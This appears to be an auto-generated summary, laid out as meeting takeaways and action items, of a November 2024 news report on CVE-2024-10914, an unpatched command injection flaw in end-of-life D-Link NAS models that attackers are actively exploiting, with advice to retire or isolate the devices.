November 13, 2024 at 01:37PM
A critical vulnerability (CVE-2024-10914) in D-Link end-of-life NAS devices allows unauthenticated command injection via malicious HTTP requests. D-Link has ceased support and advises customers to retire affected models. Despite warnings, attackers have begun exploiting this flaw, targeting over 41,000 exposed devices on the internet.
### Meeting Takeaways
1. **Critical Vulnerability Identified**: A command injection vulnerability (CVE-2024-10914) affecting multiple end-of-life D-Link NAS devices has been discovered, with publicly available exploit code.
2. **Exploitation Capability**: Unauthenticated attackers can exploit this vulnerability by sending malicious HTTP GET requests, allowing the injection of arbitrary shell commands into the affected NAS devices.
3. **Affected Models**: The at-risk devices include:
– DNS-320 Version 1.00
– DNS-320LW Version 1.01.0914.2012
– DNS-325 Versions 1.01 and 1.02
– DNS-340L Version 1.08
4. **D-Link’s Response**: D-Link announced that it will not provide fixes for the vulnerability since it impacts end-of-life (EOL) models. Customers are advised to retire or upgrade these devices to newer products.
5. **Security Recommendations**: D-Link emphasizes that EOL products no longer receive updates or support, recommending users replace these devices. Customers using affected models are urged to restrict Internet access promptly.
6. **Threat Monitoring Findings**: Shadowserver has reported that exploitation attempts began on November 12, with over 1,100 exposed devices. Netsecfish found over 41,000 unique IP addresses linked to vulnerable devices.
7. **Previous Vulnerabilities**: In April, Netsecfish reported another vulnerability impacting similar D-Link NAS models (CVE-2024-3273) that could be exploited for remote command execution.
8. **Usage Risks**: D-Link cautions users against continuing the use of these devices due to increased risk, especially in light of previous ransomware attacks targeting such vulnerable products.
9. **User Advisory**: Those who continue to use these devices, despite D-Link’s recommendations, should ensure they have the latest firmware installed.
### Action Items
– **Monitor Threat Activity**: Keep alert for ongoing threats related to these vulnerabilities.
– **User Communication**: Consider informing affected customers about the risks and strongly encourage device retirement.
– **Security Measures**: Advise users on best practices to secure their networks, including restricting Internet access to vulnerable devices.